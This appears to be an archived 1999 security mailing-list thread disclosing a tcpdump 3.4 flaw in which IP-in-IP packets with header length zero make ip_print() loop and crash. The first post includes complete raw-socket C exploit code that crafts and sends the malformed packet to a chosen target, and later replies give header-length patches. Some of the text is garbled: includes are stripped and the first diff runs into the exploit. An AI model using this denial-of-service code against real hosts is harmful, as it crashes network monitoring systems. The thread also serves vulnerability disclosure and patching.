Date: Wed, 1 Jan 1986 16:30:10 +0100 From: badi To: Subject: tcpdump 3.4 bug? /* tcpdump bug 3.4a? by BLADI (; On receiving an ip packet with Protocol-4 and ihl=0, tcpdump enters an infinite loop within the procedure ip_print() from file print_ip.c This happens because the header length (ihl) equals '0' and tcpdump tries to print the packet I've tried the bug in diferent OS's Linux: SuSE 6.x: K2.0.36 tcpdump consumes all the system memory K2.2.5 in less than a minute and hangs the system K2.2.9 or sometimes gives an error from the bus K2.3.2 K2.3.5 RedHat 5.2: K2.?.? tcpdump makes a segmentation fault to happen 6.0: K2.2.9 and it sometimes does a coredump Debian K2.2.? tcpdump makes a segmentation fault to happen and does a coredump Freebsd Segmentation fault & Coredump Thanks to: wb^3,Cagliostr Solaris Segmentation fault & Coredump Thanks to: acpizer Aix ? Hp-UX ? ------------------------------------------------------------- This tests have been carried out in loopback mode, given that protocol 4 won't get through the routers. It would be interesting to perform the attack remotely in an intranet. But i do not have access to one. ------------------------------------------------------------------------------ Thanks to: the channels: #ayuda_irc,#dune,#linux,#networking,#nova y #seguridad_informática. >from Special thanks go to: Topo[lb],^Goku^,Yogurcito,Pixie,Void,S|r_|ce,JiJ79,Unscared etc... Thanks to Piotr Wilkin for the rip base code ;) And big thanks go to TeMpEsT for this translation. ------ I've found two ways of solving the problem Solution 1 execute: tcpdump -s 24 Solution 2 Apply this little patch. diff -r -p /tcpdump-3.4a6/tcpdump-3.4a6/print-ip.c /tcpdump-3.4a7/tcpdump-3.4a6/print-ip.c *** /tcpdump-3.4a6/tcpdump-3.4a6/print-ip.c Wed May 28 21:51:45 1997 --- /tcpdump-3.4a7/tcpdump-3.4a6/print-ip.c Tue Oct 27 05:35:27 1998 *************** ip_print(register const u_char *bp, regi *** 440,446 **** (void)printf("%s > %s: ", ipaddr_string(&ip->ip_src), ipaddr_string(&ip->ip_dst)); - ip_print(cp, len); if (! vflag) { printf(" (ipip)"); return; --- 440,445 ---- */ #include #include #include #include #include #include #include #include #include #include struct icmp_hdr { struct iphdr iph; char text[15]; } encaps; int in_cksum(int *ptr, int nbytes) { long sum; u_short oddbyte, answer; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *)&oddbyte) = *(u_char *)ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } struct sockaddr_in sock_open(int socket, char *address,int prt) { struct hostent *host; struct sockaddr_in sin; if ((host = gethostbyname(address)) == NULL) { perror("Unable to get host name"); exit(-1); } bzero((char *)&sin, sizeof(sin)); sin.sin_family = PF_INET; sin.sin_port = htons(prt); bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length); return(sin); } void main(int argc, char **argv) { int sock, i,k; int on = 1; struct sockaddr_in addrs; printf("\t\tTCPDumper Ver 0.2 \n\t\t\tBy Bladi\n"); if (argc < 3) { printf("Uso: %s \n", argv[0]); exit(-1); } encaps.text[0]=66; encaps.text[1]=76; encaps.text[2]=65; encaps.text[3]=68; encaps.text[4]=73; encaps.text[5]=32; encaps.text[6]=84; encaps.text[7]=90; encaps.text[8]=32; encaps.text[9]=84; encaps.text[10]=79;encaps.text[11]=32; encaps.text[12]=84;encaps.text[13]=79;encaps.text[14]=80;encaps.text[15]=79; sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("Can't set IP_HDRINCL option on socket"); } if (sock < 0) { exit(-1); } fflush(stdout); addrs = sock_open(sock, argv[2], random() % 255); encaps.iph.version = 0; encaps.iph.ihl = 0; encaps.iph.frag_off = htons(0); = htons(0x001); encaps.iph.protocol = 4; encaps.iph.ttl = 146; encaps.iph.tot_len = 6574; encaps.iph.daddr = addrs.sin_addr.s_addr; encaps.iph.saddr = inet_addr(argv[1]); printf ("\t DuMpInG %s ---> %s \n",argv[1],argv[2]); if (sendto(sock, &encaps, 1204, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1) { if (errno != ENOBUFS) printf("Error :(\n"); } fflush(stdout); close(sock); } -------------------------------------------------------------------------------- Date: Thu, 17 Jun 1999 12:19:06 +0100 From: acpizer To: Subject: Re: tcpdump 3.4 bug? The given source for killing tcpdump will only work on local networks since routers drop the bad packet it creates, a more constuctive patch for tcpdump is listed below. -- snip -- diff -r -p print-ip.orig.c print-ip.c *** print-ip.orig.c Thu Jun 17 11:24:17 1999 --- print-ip.c Thu Jun 17 14:07:50 1999 *************** ip_print(register const u_char *bp, regi *** 374,379 **** --- 374,384 ---- (void)printf("truncated-ip %d", length); return; } + + if (ip->ip_hl == 0) { + (void)printf("bad ip packet - header length = 0\n"); + return; + } hlen = ip->ip_hl * 4; len = ntohs(ip->ip_len); -- snip -- Cheers. ------------------------------------------------------------------------------- "Probably you've only really grown up, when you can bear not being understood." Marian Gold /Alphaville -------------------------------------------------------------------------------- Date: Fri, 18 Jun 1999 13:16:33 +0300 From: Markus Peuhkuri To: Subject: Re: tcpdump 3.4 bug? acpizer writes: > since routers drop the bad packet it creates, a more constuctive patch for ... > + if (ip->ip_hl == 0) { Actualy, as the minimum length is 5*4 bytes that could be as well "if (ip->ip_hl < 5) {". If it is shorter it is bad anyway. -- Markus Peuhkuri ! ! -------------------------------------------------------------------------------- Date: Sun, 20 Jun 1999 09:17:32 +0100 From: acpizer To: Subject: Re: tcpdump 3.4 bug? (final) Hi again, Thanks goes to Markus Peuhkuri for pointing out that the minimum length of an IP packet is actually 20 bytes, (I'm useless w/o a copy of TCP/IP Illustrated in front of me), anyway, here is a final patch, also don't forget to run tcpdump with the -v parameter if you want to see the source address of the offensive packet. Are the guys at LBL reading bugtraq? (tcpdump on isn't updated yet...) maybe they don't think it's a bug since routers drop the packet anyway, how aobut attacking machines which run tcpdump locally on the LAN? *** print-ip.orig.c Thu Jun 17 11:24:17 1999 --- print-ip.c Sun Jun 20 11:04:20 1999 *************** ip_print(register const u_char *bp, regi *** 440,445 **** --- 440,451 ---- (void)printf("%s > %s: ", ipaddr_string(&ip->ip_src), ipaddr_string(&ip->ip_dst)); + + if (ip->ip_hl < 5) { + (void)printf("Bad ip-in-ip encapsulation (hl < 5) Possible attack!"); + return; + } + ip_print(cp, len); if (! vflag) { printf(" (ipip)"); Cheers. ------------------------------------------------------------------------------- "Probably you've only really grown up, when you can bear not being understood." Marian Gold /Alphaville